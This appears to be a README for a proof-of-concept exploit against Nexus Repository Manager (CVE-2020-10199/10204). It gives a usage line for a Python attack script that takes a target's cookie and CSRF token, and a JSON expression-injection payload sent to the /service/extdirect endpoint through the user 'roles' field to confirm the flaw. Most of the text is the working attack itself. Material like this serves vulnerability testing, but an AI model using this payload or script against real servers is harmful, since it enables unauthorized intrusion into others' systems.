Nexus Repository Manager CVE-2020-10199/10204

Nexus Repository Manager OSS/Pro: <=3.21.1

Nexus Repository Manager 3.21.1

Nexus POCE Exploit

Usage:python3 -i -p 8081 -c cookie -csrf csrf-token

1), CVE-2020-10204

Manual verification is as follows:
Under http: // domain name: port / service / extdirecturl, replace the POST message body with the following attack payload. If the response packet returns "roles" value "this is vulnerability", it proves that the system has a vulnerability.

Attack payload: {"action":"coreui_User","method":"update","data":[{"userId":"test","version":"1.0","firstNa me":"xxx","lastName":"xxx","email":"[email protected]","status":"active","roles":["$+{'this is vulnerability'.toUpperCase()}"]}],"type":"rpc","tid":7}